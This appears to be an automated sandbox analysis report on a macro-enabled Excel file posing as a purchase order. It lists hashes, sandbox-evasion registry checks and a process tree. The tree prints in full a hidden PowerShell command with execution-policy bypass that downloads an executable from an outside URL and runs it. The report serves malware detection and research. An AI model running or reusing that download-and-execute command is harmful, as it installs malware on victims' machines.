Analysis
-
max time kernel
135s -
max time network
131s -
platform
windows10_x64 -
resource
win10 -
submitted
16/07/2020, 18:37
Static task
static1
Behavioral task
behavioral1
Sample
BratneyCompaniesPO-5313SCXC-097.xlsm
Resource
win7
Behavioral task
behavioral2
Sample
BratneyCompaniesPO-5313SCXC-097.xlsm
Resource
win10
General
-
Target
BratneyCompaniesPO-5313SCXC-097.xlsm
-
Size
139KB
-
MD5
49a24e9873f40ce4424c9f324660874f
-
SHA1
c833cc3c580e565ab3e831fba24351c5e5d59293
-
SHA256
b498465b42c81550c8e6e6afe13029fe4a552d54b2134425d6b521a4190eb9ab
-
SHA512
b339439dd4e2fc21b5b401a673d6caed20fb504b49a81cd0697453ddd7e76f0f400f91f29459cfead07e087922cbf65686a6745320baf5b0faf9314c22bab0fb
Malware Config
Extracted
http://hsdowsggpla.com/ThurEvent.exe
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3588 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1916 3588 cmd.exe 66 -
Executes dropped EXE 1 IoCs
pid Process 652 9ouqX.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Blacklisted process makes network request 1 IoCs
flow pid Process 11 2600 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE 3588 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3588 wrote to memory of 1916 3588 EXCEL.EXE 71 PID 3588 wrote to memory of 1916 3588 EXCEL.EXE 71 PID 1916 wrote to memory of 2600 1916 cmd.exe 73 PID 1916 wrote to memory of 2600 1916 cmd.exe 73 PID 2600 wrote to memory of 652 2600 powershell.exe 75 PID 2600 wrote to memory of 652 2600 powershell.exe 75 PID 2600 wrote to memory of 652 2600 powershell.exe 75 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 652 9ouqX.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2600 powershell.exe 2600 powershell.exe 2600 powershell.exe 652 9ouqX.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\BratneyCompaniesPO-5313SCXC-097.xlsm"1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\SYSTEM32\cmd.execmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hsdowsggpla.com/ThurEvent.exe',$env:Temp+'\9ouqX.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\9ouqX.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://hsdowsggpla.com/ThurEvent.exe',$env:Temp+'\9ouqX.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\9ouqX.exe')3⤵
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\9ouqX.exe"C:\Users\Admin\AppData\Local\Temp\9ouqX.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:652
-
-
-